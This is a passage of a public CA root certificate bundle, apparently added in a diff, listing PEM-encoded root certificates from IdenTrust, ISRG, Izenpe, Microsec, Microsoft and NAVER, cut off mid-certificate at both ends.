+bNe/JgERohYpSms0BpDsE9K2+2p20jzt8NYt3eEV7KObLyzJPivkaTv/ciWxNoZb +x39ri1UbSsUgYT2uy1DhCDq+sI9jQVMwCFk8mB13umOResoQUGC/8Ne8lYePl8X+ +l2oBlKN8W4UdKjk60FSh0Tlxnf0h+bV78OLgAo9uliQlLKAeLKjEiafv7ZkGL7YK +TE/bosw3Gq9HhS2KX8Q0NEwA/RiTZxPRN+ZItIsGxVd7GYYKecsAyVKvQv83j+Gj +Hno9UKtjBucVtT+2RTeUN7F+8kjDf8V1/peNRY8apxpyKBpADwIDAQABo2MwYTAP +BgNVHRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIBBjAfBgNVHSMEGDAWgBQXnc0e +i9Y5K3DTXNSguB+wAPzFYTAdBgNVHQ4EFgQUF53NHovWOStw01zUoLgfsAD8xWEw +DQYJKoZIhvcNAQELBQADggIBAFbVe27mIgHSQpsY1Q7XZiNc4/6gx5LS6ZStS6LG +7BJ8dNVI0lkUmcDrudHr9EgwW62nV3OZqdPlt9EuWSRY3GguLmLYauRwCy0gUCCk +MpXRAJi70/33MvJJrsZ64Ee+bs7Lo3I6LWldy8joRTnU+kLBEUx3XZL7av9YROXr +gZ6voJmtvqkBZss4HTzfQx/0TW60uhdG/H39h4F5ag0zD/ov+BS5gLNdTaqX4fnk +GMX41TiMJjz98iji7lpJiCzfeT2OnpA8vUFKOt1b9pq0zj8lMH8yfaIDlNDceqFS +3m6TjRgm/VWsvY+b0s+v54Ysyx8Jb6NvqYTUc79NoXQbTiNg8swOqn+knEwlqLJm +Ozj/2ZQw9nKEvmhVEA/GcywWaZMH/rFF7buiVWqw2rVKAiUnhde3t4ZEFolsgCs+ +l6mc1X5VTMbeRRAc6uk7nwNT7u56AQIWeNTowr5GdogTPyK7SBIdUgC0An4hGh6c +JfTzPV4e0hz5sy229zdcxsshTrD3mUcYhcErulWuBurQB7Lcq9CClnXO0lD+mefP +L5/ndtFhKvshuzHQqp9HpLIiyhY6UFfEW0NnxWViA0kB60PZ2Pierc+xYw5F9KBa +LJstxabArahH9CdMOA0uG0k7UvToiIMrVCjU8jVStDKDYmlkDJGcn5fqdBb9HxEG +mpv0 +-----END CERTIFICATE----- + +# IdenTrust Commercial Root CA 1 +-----BEGIN CERTIFICATE----- +MIIFYDCCA0igAwIBAgIQCgFCgAAAAUUjyES1AAAAAjANBgkqhkiG9w0BAQsFADBK +MQswCQYDVQQGEwJVUzESMBAGA1UEChMJSWRlblRydXN0MScwJQYDVQQDEx5JZGVu +VHJ1c3QgQ29tbWVyY2lhbCBSb290IENBIDEwHhcNMTQwMTE2MTgxMjIzWhcNMzQw +MTE2MTgxMjIzWjBKMQswCQYDVQQGEwJVUzESMBAGA1UEChMJSWRlblRydXN0MScw +JQYDVQQDEx5JZGVuVHJ1c3QgQ29tbWVyY2lhbCBSb290IENBIDEwggIiMA0GCSqG +SIb3DQEBAQUAA4ICDwAwggIKAoICAQCnUBneP5k91DNG8W9RYYKyqU+PZ4ldhNlT +3Qwo2dfw/66VQ3KZ+bVdfIrBQuExUHTRgQ18zZshq0PirK1ehm7zCYofWjK9ouuU ++ehcCuz/mNKvcbO0U59Oh++SvL3sTzIwiEsXXlfEU8L2ApeN2WIrvyQfYo3fw7gp +S0l4PJNgiCL8mdo2yMKi1CxUAGc1bnO/AljwpN3lsKImesrgNqUZFvX9t++uP0D1 +bVoE/c40yiTcdCMbXTMTEl3EASX2MN0CXZ/g1Ue9tOsbobtJSdifWwLziuQkkORi +T0/Br4sOdBeo0XKIanoBScy0RnnGF7HamB4HWfp1IYVl3ZBWzvurpWCdxJ35UrCL +vYf5jysjCiN2O/cz4ckA82n5S6LgTrx+kzmEB/dEcH7+B1rlsazRGMzyNeVJSQjK +Vsk9+w8YfYs7wRPCTY/JTw436R+hDmrfYi7LNQZReSzIJTj0+kuniVyc0uMNOYZK +dHzVWYfCP04MXFL0PfdSgvHqo6z9STQaKPNBiDoT7uje/5kdX7rL6B7yuVBgwDHT +c+XvvqDtMwt0viAgxGds8AgDelWAf0ZOlqf0Hj7h9tgJ4TNkK2PXMl6f+cB7D3hv +l7yTmvmcEpB4eoCHFddydJxVdHixuuFucAS6T6C6aMN7/zHwcz09lCqxC0EOoP5N +iGVreTO01wIDAQABo0IwQDAOBgNVHQ8BAf8EBAMCAQYwDwYDVR0TAQH/BAUwAwEB +/zAdBgNVHQ4EFgQU7UQZwNPwBovupHu+QucmVMiONnYwDQYJKoZIhvcNAQELBQAD +ggIBAA2ukDL2pkt8RHYZYR4nKM1eVO8lvOMIkPkp165oCOGUAFjvLi5+U1KMtlwH +6oi6mYtQlNeCgN9hCQCTrQ0U5s7B8jeUeLBfnLOic7iPBZM4zY0+sLj7wM+x8uwt +LRvM7Kqas6pgghstO8OEPVeKlh6cdbjTMM1gCIOQ045U8U1mwF10A0Cj7oV+wh93 +nAbowacYXVKV7cndJZ5t+qntozo00Fl72u1Q8zW/7esUTTHHYPTa8Yec4kjixsU3 ++wYQ+nVZZjFHKdp2mhzpgq7vmrlR94gjmmmVYjzlVYA211QC//G5Xc7UI2/YRYRK +W2XviQzdFKcgyxilJbQN+QHwotL0AMh0jqEqSI5l2xPE4iUXfeu+h1sXIFRRk0pT +AwvsXcoz7WL9RccvW9xYoIA55vrX/hMUpu09lEpCdNTDd1lzzY9GvlU47/rokTLq +l1gEIt44w8y8bckzOmoKaT+gyOpyj4xjhiO9bTyWnpXgSUyqorkqG5w2gXjtw+hG +4iZZRHUe2XWJUc0QhJ1hYMtd+ZciTY6Y5uN/9lu7rs3KSoFrXgvzUeF0K+l+J6fZ +mUlO+KWA2yUPHGNiiskzZ2s8EIPGrd6ozRaOjfAHN3Gf8qv8QfXBi+wAN10J5U6A +7/qxXDgGpRtK4dw4LTzcqx+QGtVKnO7RcGzM7vRX+Bi6hG6H +-----END CERTIFICATE----- + +# IdenTrust Public Sector Root CA 1 +-----BEGIN CERTIFICATE----- +MIIFZjCCA06gAwIBAgIQCgFCgAAAAUUjz0Z8AAAAAjANBgkqhkiG9w0BAQsFADBN +MQswCQYDVQQGEwJVUzESMBAGA1UEChMJSWRlblRydXN0MSowKAYDVQQDEyFJZGVu +VHJ1c3QgUHVibGljIFNlY3RvciBSb290IENBIDEwHhcNMTQwMTE2MTc1MzMyWhcN +MzQwMTE2MTc1MzMyWjBNMQswCQYDVQQGEwJVUzESMBAGA1UEChMJSWRlblRydXN0 +MSowKAYDVQQDEyFJZGVuVHJ1c3QgUHVibGljIFNlY3RvciBSb290IENBIDEwggIi +MA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQC2IpT8pEiv6EdrCvsnduTyP4o7 +ekosMSqMjbCpwzFrqHd2hCa2rIFCDQjrVVi7evi8ZX3yoG2LqEfpYnYeEe4IFNGy +RBb06tD6Hi9e28tzQa68ALBKK0CyrOE7S8ItneShm+waOh7wCLPQ5CQ1B5+ctMlS +bdsHyo+1W/CD80/HLaXIrcuVIKQxKFdYWuSNG5qrng0M8gozOSI5Cpcu81N3uURF +/YTLNiCBWS2ab21ISGHKTN9T0a9SvESfqy9rg3LvdYDaBjMbXcjaY8ZNzaxmMc3R +3j6HEDbhuaR672BQssvKplbgN6+rNBM5Jeg5ZuSYeqoSmJxZZoY+rfGwyj4GD3vw +EUs3oERte8uojHH01bWRNszwFcYr3lEXsZdMUD2xlVl8BX0tIdUAvwFnol57plzy +9yLxkA2T26pEUWbMfXYD62qoKjgZl3YNa4ph+bz27nb9cCvdKTz4Ch5bQhyLVi9V +GxyhLrXHFub4qjySjmm2AcG1hp2JDws4lFTo6tyePSW8Uybt1as5qsVATFSrsrTZ +2fjXctscvG29ZV/viDUqZi/u9rNl8DONfJhBaUYPQxxp+pu10GFqzcpL2UyQRqsV +WaFHVCkugyhfHMKiq3IXAAaOReyL4jM9f9oZRORicsPfIsbyVtTdX5Vy7W1f90gD +W/3FKqD2cyOEEBsB5wIDAQABo0IwQDAOBgNVHQ8BAf8EBAMCAQYwDwYDVR0TAQH/ +BAUwAwEB/zAdBgNVHQ4EFgQU43HgntinQtnbcZFrlJPrw6PRFKMwDQYJKoZIhvcN +AQELBQADggIBAEf63QqwEZE4rU1d9+UOl1QZgkiHVIyqZJnYWv6IAcVYpZmxI1Qj +t2odIFflAWJBF9MJ23XLblSQdf4an4EKwt3X9wnQW3IV5B4Jaj0z8yGa5hV+rVHV +DRDtfULAj+7AmgjVQdZcDiFpboBhDhXAuM/FSRJSzL46zNQuOAXeNf0fb7iAaJg9 +TaDKQGXSc3z1i9kKlT/YPyNtGtEqJBnZhbMX73huqVjRI9PHE+1yJX9dsXNw0H8G +lwmEKYBhHfpe/3OsoOOJuBxxFcbeMX8S3OFtm6/n6J91eEyrRjuazr8FGF1NFTwW +mhlQBJqymm9li1JfPFgEKCXAZmExfrngdbkaqIHWchezxQMxNRF4eKLg6TCMf4Df +WN88uieW4oA0beOY02QnrEh+KHdcxiVhJfiFDGX6xDIvpZgF5PgLZxYWxoK4Mhn5 ++bl53B/N66+rDt0b20XkeucC4pVd/GnwU2lhlXV5C15V5jgclKlZM57IcXR5f1GJ +tshquDDIajjDbp7hNxbqBWJMWxJH7ae0s1hWx0nzfxJoCTFx8G34Tkf71oXuxVhA +GaQdp/lLQzfcaFpPz+vCZHTetBXZ9FRUGi8c15dxVJCO2SCdUyt/q4/i6jC8UDfv +8Ue1fXwsBOxonbRJRBD0ckscZOf85muQ3Wl9af0AVqW3rLatt8o+Ae+c +-----END CERTIFICATE----- + +# ISRG Root X1 +-----BEGIN CERTIFICATE----- +MIIFazCCA1OgAwIBAgIRAIIQz7DSQONZRGPgu2OCiwAwDQYJKoZIhvcNAQELBQAw +TzELMAkGA1UEBhMCVVMxKTAnBgNVBAoTIEludGVybmV0IFNlY3VyaXR5IFJlc2Vh +cmNoIEdyb3VwMRUwEwYDVQQDEwxJU1JHIFJvb3QgWDEwHhcNMTUwNjA0MTEwNDM4 +WhcNMzUwNjA0MTEwNDM4WjBPMQswCQYDVQQGEwJVUzEpMCcGA1UEChMgSW50ZXJu +ZXQgU2VjdXJpdHkgUmVzZWFyY2ggR3JvdXAxFTATBgNVBAMTDElTUkcgUm9vdCBY +MTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAK3oJHP0FDfzm54rVygc +h77ct984kIxuPOZXoHj3dcKi/vVqbvYATyjb3miGbESTtrFj/RQSa78f0uoxmyF+ +0TM8ukj13Xnfs7j/EvEhmkvBioZxaUpmZmyPfjxwv60pIgbz5MDmgK7iS4+3mX6U +A5/TR5d8mUgjU+g4rk8Kb4Mu0UlXjIB0ttov0DiNewNwIRt18jA8+o+u3dpjq+sW +T8KOEUt+zwvo/7V3LvSye0rgTBIlDHCNAymg4VMk7BPZ7hm/ELNKjD+Jo2FR3qyH +B5T0Y3HsLuJvW5iB4YlcNHlsdu87kGJ55tukmi8mxdAQ4Q7e2RCOFvu396j3x+UC +B5iPNgiV5+I3lg02dZ77DnKxHZu8A/lJBdiB3QW0KtZB6awBdpUKD9jf1b0SHzUv +KBds0pjBqAlkd25HN7rOrFleaJ1/ctaJxQZBKT5ZPt0m9STJEadao0xAH0ahmbWn +OlFuhjuefXKnEgV4We0+UXgVCwOPjdAvBbI+e0ocS3MFEvzG6uBQE3xDk3SzynTn +jh8BCNAw1FtxNrQHusEwMFxIt4I7mKZ9YIqioymCzLq9gwQbooMDQaHWBfEbwrbw +qHyGO0aoSCqI3Haadr8faqU9GY/rOPNk3sgrDQoo//fb4hVC1CLQJ13hef4Y53CI +rU7m2Ys6xt0nUW7/vGT1M0NPAgMBAAGjQjBAMA4GA1UdDwEB/wQEAwIBBjAPBgNV +HRMBAf8EBTADAQH/MB0GA1UdDgQWBBR5tFnme7bl5AFzgAiIyBpY9umbbjANBgkq +hkiG9w0BAQsFAAOCAgEAVR9YqbyyqFDQDLHYGmkgJykIrGF1XIpu+ILlaS/V9lZL +ubhzEFnTIZd+50xx+7LSYK05qAvqFyFWhfFQDlnrzuBZ6brJFe+GnY+EgPbk6ZGQ +3BebYhtF8GaV0nxvwuo77x/Py9auJ/GpsMiu/X1+mvoiBOv/2X/qkSsisRcOj/KK +NFtY2PwByVS5uCbMiogziUwthDyC3+6WVwW6LLv3xLfHTjuCvjHIInNzktHCgKQ5 +ORAzI4JMPJ+GslWYHb4phowim57iaztXOoJwTdwJx4nLCgdNbOhdjsnvzqvHu7Ur +TkXWStAmzOVyyghqpZXjFaH3pO3JLF+l+/+sKAIuvtd7u+Nxe5AW0wdeRlN8NwdC +jNPElpzVmbUq4JUagEiuTDkHzsxHpFKVK7q4+63SM1N95R1NbdWhscdCb+ZAJzVc +oyi3B43njTOQ5yOf+1CceWxG1bQVs5ZufpsMljq4Ui0/1lvh+wjChP4kqKOJ2qxq +4RgqsahDYVvTH9w7jXbyLeiNdd8XM2w9U/t7y0Ff/9yi0GE44Za4rF2LN9d11TPA +mRGunUHBcnWEvgJBQl9nJEiU0Zsnvgc/ubhPgXRR4Xq37Z0j4r7g1SgEEzwxA57d +emyPxgcYxn/eR44/KJ4EBs+lVDR3veyJm+kXQ99b21/+jh5Xos1AnX5iItreGCc= +-----END CERTIFICATE----- + +# ISRG Root X2 +-----BEGIN CERTIFICATE----- +MIICGzCCAaGgAwIBAgIQQdKd0XLq7qeAwSxs6S+HUjAKBggqhkjOPQQDAzBPMQsw +CQYDVQQGEwJVUzEpMCcGA1UEChMgSW50ZXJuZXQgU2VjdXJpdHkgUmVzZWFyY2gg +R3JvdXAxFTATBgNVBAMTDElTUkcgUm9vdCBYMjAeFw0yMDA5MDQwMDAwMDBaFw00 +MDA5MTcxNjAwMDBaME8xCzAJBgNVBAYTAlVTMSkwJwYDVQQKEyBJbnRlcm5ldCBT +ZWN1cml0eSBSZXNlYXJjaCBHcm91cDEVMBMGA1UEAxMMSVNSRyBSb290IFgyMHYw +EAYHKoZIzj0CAQYFK4EEACIDYgAEzZvVn4CDCuwJSvMWSj5cz3es3mcFDR0HttwW ++1qLFNvicWDEukWVEYmO6gbf9yoWHKS5xcUy4APgHoIYOIvXRdgKam7mAHf7AlF9 +ItgKbppbd9/w+kHsOdx1ymgHDB/qo0IwQDAOBgNVHQ8BAf8EBAMCAQYwDwYDVR0T +AQH/BAUwAwEB/zAdBgNVHQ4EFgQUfEKWrt5LSDv6kviejM9ti6lyN5UwCgYIKoZI +zj0EAwMDaAAwZQIwe3lORlCEwkSHRhtFcP9Ymd70/aTSVaYgLXTWNLxBo1BfASdW +tL4ndQavEi51mI38AjEAi/V3bNTIZargCyzuFJ0nN6T5U6VR5CmD1/iQMVtCnwr1 +/q4AaOeMSQ+2b1tbFfLn +-----END CERTIFICATE----- + +# Izenpe.com +-----BEGIN CERTIFICATE----- +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 +-----END CERTIFICATE----- + +# Microsec e-Szigno Root CA 2009 +-----BEGIN CERTIFICATE----- +MIIECjCCAvKgAwIBAgIJAMJ+QwRORz8ZMA0GCSqGSIb3DQEBCwUAMIGCMQswCQYD +VQQGEwJIVTERMA8GA1UEBwwIQnVkYXBlc3QxFjAUBgNVBAoMDU1pY3Jvc2VjIEx0 +ZC4xJzAlBgNVBAMMHk1pY3Jvc2VjIGUtU3ppZ25vIFJvb3QgQ0EgMjAwOTEfMB0G +CSqGSIb3DQEJARYQaW5mb0BlLXN6aWduby5odTAeFw0wOTA2MTYxMTMwMThaFw0y +OTEyMzAxMTMwMThaMIGCMQswCQYDVQQGEwJIVTERMA8GA1UEBwwIQnVkYXBlc3Qx +FjAUBgNVBAoMDU1pY3Jvc2VjIEx0ZC4xJzAlBgNVBAMMHk1pY3Jvc2VjIGUtU3pp +Z25vIFJvb3QgQ0EgMjAwOTEfMB0GCSqGSIb3DQEJARYQaW5mb0BlLXN6aWduby5o +dTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAOn4j/NjrdqG2KfgQvvP +kd6mJviZpWNwrZuuyjNAfW2WbqEORO7hE52UQlKavXWFdCyoDh2Tthi3jCyoz/tc +cbna7P7ofo/kLx2yqHWH2Leh5TvPmUpG0IMZfcChEhyVbUr02MelTTMuhTlAdX4U +fIASmFDHQWe4oIBhVKZsTh/gnQ4H6cm6M+f+wFUoLAKApxn1ntxVUwOXewdI/5n7 +N4okxFnMUBBjjqqpGrCEGob5X7uxUG6k0QrM1XF+H6cbfPVTbiJfyyvm1HxdrtbC +xkzlBQHZ7Vf8wSN5/PrIJIOV87VqUQHQd9bpEqH5GoP7ghu5sJf0dgYzQ0mg/wu1 ++rUCAwEAAaOBgDB+MA8GA1UdEwEB/wQFMAMBAf8wDgYDVR0PAQH/BAQDAgEGMB0G +A1UdDgQWBBTLD8bfQkPMPcu1SCOhGnqmKrs0aDAfBgNVHSMEGDAWgBTLD8bfQkPM +Pcu1SCOhGnqmKrs0aDAbBgNVHREEFDASgRBpbmZvQGUtc3ppZ25vLmh1MA0GCSqG +SIb3DQEBCwUAA4IBAQDJ0Q5eLtXMs3w+y/w9/w0olZMEyL/azXm4Q5DwpL7v8u8h +mLzU1F0G9u5C7DBsoKqpyvGvivo/C3NqPuouQH4frlRheesuCDfXI/OMn74dseGk +ddug4lQUsbocKaQY9hK6ohQU4zE1yED/t+AFdlfBHFny+L/k7SViXITwfn4fs775 +tyERzAMBVnCnEJIeGzSBHq2cGsMEPO0CYdYeBvNfOofyK/FFh+U9rNHHV4S9a67c +2Pm2G2JwCz02yULyMtd6YebS2z3PyKnJm9zbWETXbzivf3jTo60adbocwTZ8jx5t +HMN1Rq41Bab2XD0h7lbwyYIiLXpUq3DDfSJlgnCW +-----END CERTIFICATE----- + +# Microsoft ECC Root Certificate Authority 2017 +-----BEGIN CERTIFICATE----- +MIICWTCCAd+gAwIBAgIQZvI9r4fei7FK6gxXMQHC7DAKBggqhkjOPQQDAzBlMQsw +CQYDVQQGEwJVUzEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMTYwNAYD +VQQDEy1NaWNyb3NvZnQgRUNDIFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5IDIw +MTcwHhcNMTkxMjE4MjMwNjQ1WhcNNDIwNzE4MjMxNjA0WjBlMQswCQYDVQQGEwJV +UzEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMTYwNAYDVQQDEy1NaWNy +b3NvZnQgRUNDIFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5IDIwMTcwdjAQBgcq +hkjOPQIBBgUrgQQAIgNiAATUvD0CQnVBEyPNgASGAlEvaqiBYgtlzPbKnR5vSmZR +ogPZnZH6thaxjG7efM3beaYvzrvOcS/lpaso7GMEZpn4+vKTEAXhgShC48Zo9OYb +hGBKia/teQ87zvH2RPUBeMCjVDBSMA4GA1UdDwEB/wQEAwIBhjAPBgNVHRMBAf8E +BTADAQH/MB0GA1UdDgQWBBTIy5lycFIM+Oa+sgRXKSrPQhDtNTAQBgkrBgEEAYI3 +FQEEAwIBADAKBggqhkjOPQQDAwNoADBlAjBY8k3qDPlfXu5gKcs68tvWMoQZP3zV +L8KxzJOuULsJMsbG7X7JNpQS5GiFBqIb0C8CMQCZ6Ra0DvpWSNSkMBaReNtUjGUB +iudQZsIxtzm6uBoiB078a1QWIP8rtedMDE2mT3M= +-----END CERTIFICATE----- + +# Microsoft RSA Root Certificate Authority 2017 +-----BEGIN CERTIFICATE----- +MIIFqDCCA5CgAwIBAgIQHtOXCV/YtLNHcB6qvn9FszANBgkqhkiG9w0BAQwFADBl +MQswCQYDVQQGEwJVUzEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMTYw +NAYDVQQDEy1NaWNyb3NvZnQgUlNBIFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 +IDIwMTcwHhcNMTkxMjE4MjI1MTIyWhcNNDIwNzE4MjMwMDIzWjBlMQswCQYDVQQG +EwJVUzEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMTYwNAYDVQQDEy1N +aWNyb3NvZnQgUlNBIFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5IDIwMTcwggIi +MA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDKW76UM4wplZEWCpW9R2LBifOZ +Nt9GkMml7Xhqb0eRaPgnZ1AzHaGm++DlQ6OEAlcBXZxIQIJTELy/xztokLaCLeX0 +ZdDMbRnMlfl7rEqUrQ7eS0MdhweSE5CAg2Q1OQT85elss7YfUJQ4ZVBcF0a5toW1 +HLUX6NZFndiyJrDKxHBKrmCk3bPZ7Pw71VdyvD/IybLeS2v4I2wDwAW9lcfNcztm +gGTjGqwu+UcF8ga2m3P1eDNbx6H7JyqhtJqRjJHTOoI+dkC0zVJhUXAoP8XFWvLJ +jEm7FFtNyP9nTUwSlq31/niol4fX/V4ggNyhSyL71Imtus5Hl0dVe49FyGcohJUc +aDDv70ngNXtk55iwlNpNhTs+VcQor1fznhPbRiefHqJeRIOkpcrVE7NLP8TjwuaG +YaRSMLl6IE9vDzhTyzMMEyuP1pq9KsgtsRx9S1HKR9FIJ3Jdh+vVReZIZZ2vUpC6 +W6IYZVcSn2i51BVrlMRpIpj0M+Dt+VGOQVDJNE92kKz8OMHY4Xu54+OU4UZpyw4K +UGsTuqwPN1q3ErWQgR5WrlcihtnJ0tHXUeOrO8ZV/R4O03QK0dqq6mm4lyiPSMQH ++FJDOvTKVTUssKZqwJz58oHhEmrARdlns87/I6KJClTUFLkqqNfs+avNJVgyeY+Q +W5g5xAgGwax/Dj0ApQIDAQABo1QwUjAOBgNVHQ8BAf8EBAMCAYYwDwYDVR0TAQH/ +BAUwAwEB/zAdBgNVHQ4EFgQUCctZf4aycI8awznjwNnpv7tNsiMwEAYJKwYBBAGC +NxUBBAMCAQAwDQYJKoZIhvcNAQEMBQADggIBAKyvPl3CEZaJjqPnktaXFbgToqZC +LgLNFgVZJ8og6Lq46BrsTaiXVq5lQ7GPAJtSzVXNUzltYkyLDVt8LkS/gxCP81OC +gMNPOsduET/m4xaRhPtthH80dK2Jp86519efhGSSvpWhrQlTM93uCupKUY5vVau6 +tZRGrox/2KJQJWVggEbbMwSubLWYdFQl3JPk+ONVFT24bcMKpBLBaYVu32TxU5nh +SnUgnZUP5NbcA/FZGOhHibJXWpS2qdgXKxdJ5XbLwVaZOjex/2kskZGT4d9Mozd2 +TaGf+G0eHdP67Pv0RR0Tbc/3WeUiJ3IrhvNXuzDtJE3cfVa7o7P4NHmJweDyAmH3 +pvwPuxwXC65B2Xy9J6P9LjrRk5Sxcx0ki69bIImtt2dmefU6xqaWM/5TkshGsRGR +xpl/j8nWZjEgQRCHLQzWwa80mMpkg/sTV9HB8Dx6jKXB/ZUhoHHBk2dxEuqPiApp +GWSZI1b7rCoucL5mxAyE7+WL85MB+GqQk2dLsmijtWKP6T+MejteD+eMuMZ87zf9 +dOLITzNy4ZQ5bb0Sr74MTnB8G2+NszKTc0QWbej09+CVgI+WXTik9KveCjCHk9hN +AHFiRSdLOkKEW39lt2c0Ui2cFmuqqNh7o0JMcccMyj6D5KbvtwEwXlGjefVwaaZB +RA+GsCyRxj3qrg+E +-----END CERTIFICATE----- + +# NAVER Global Root Certification Authority +-----BEGIN CERTIFICATE----- +MIIFojCCA4qgAwIBAgIUAZQwHqIL3fXFMyqxQ0Rx+NZQTQ0wDQYJKoZIhvcNAQEM +BQAwaTELMAkGA1UEBhMCS1IxJjAkBgNVBAoMHU5BVkVSIEJVU0lORVNTIFBMQVRG +T1JNIENvcnAuMTIwMAYDVQQDDClOQVZFUiBHbG9iYWwgUm9vdCBDZXJ0aWZpY2F0 +aW9uIEF1dGhvcml0eTAeFw0xNzA4MTgwODU4NDJaFw0zNzA4MTgyMzU5NTlaMGkx +CzAJBgNVBAYTAktSMSYwJAYDVQQKDB1OQVZFUiBCVVNJTkVTUyBQTEFURk9STSBD +b3JwLjEyMDAGA1UEAwwpTkFWRVIgR2xvYmFsIFJvb3QgQ2VydGlmaWNhdGlvbiBB +dXRob3JpdHkwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQC21PGTXLVA +iQqrDZBbUGOukJR0F0Vy1ntlWilLp1agS7gvQnXp2XskWjFlqxcX0TM62RHcQDaH +38dq6SZeWYp34+hInDEW+j6RscrJo+KfziFTowI2MMtSAuXaMl3Dxeb57hHHi8lE +HoSTGEq0n+USZGnQJoViAbbJAh2+g1G7XNr4rRVqmfeSVPc0W+m/6imBEtRTkZaz +kVrd/pBzKPswRrXKCAfHcXLJZtM0l/aM9BhK4dA9WkW2aacp+yPOiNgSnABIqKYP +szuSjXEOdMWLyEz59JuOuDxp7W87UC9Y7cSw0BwbagzivESq2M0UXZR4Yb8Obtoq +vC8MC3GmsxY/nOb5zJ9TNeIDoKAYv7vxvvTWjIcNQvcGufFt7QSUqP620wbGQGHf +nZ3zVHbOUzoBppJB7ASjjw2i1QnK1sua8e9DXcCrpUHPXFNwcMmIpi3Ua2FzUCaG +YQ5fG8Ir4ozVu53BA0K6lNpfqbDKzE0K70dpAy8i+/Eozr9dUGWokG2zdLAIx6yo +0es+nPxdGoMuK8u180SdOqcXYZaicdNwlhVNt0xz7hlcxVs+Qf6sdWA7G2POAN3a +CJBitOUt7kinaxeZVL6HSuOpXgRM6xBtVNbv8ejyYhbLgGvtPe31HzClrkvJE+2K +AQHJuFFYwGY6sWZLxNUxAmLpdIQM201GLQIDAQABo0IwQDAdBgNVHQ4EFgQU0p+I +36HNLL3s9TsBAZMzJ7LrYEswDgYDVR0PAQH/BAQDAgEGMA8GA1UdEwEB/wQFMAMB +Af8wDQYJKoZIhvcNAQEMBQADggIBADLKgLOdPVQG3dLSLvCkASELZ0jKbY7gyKoN 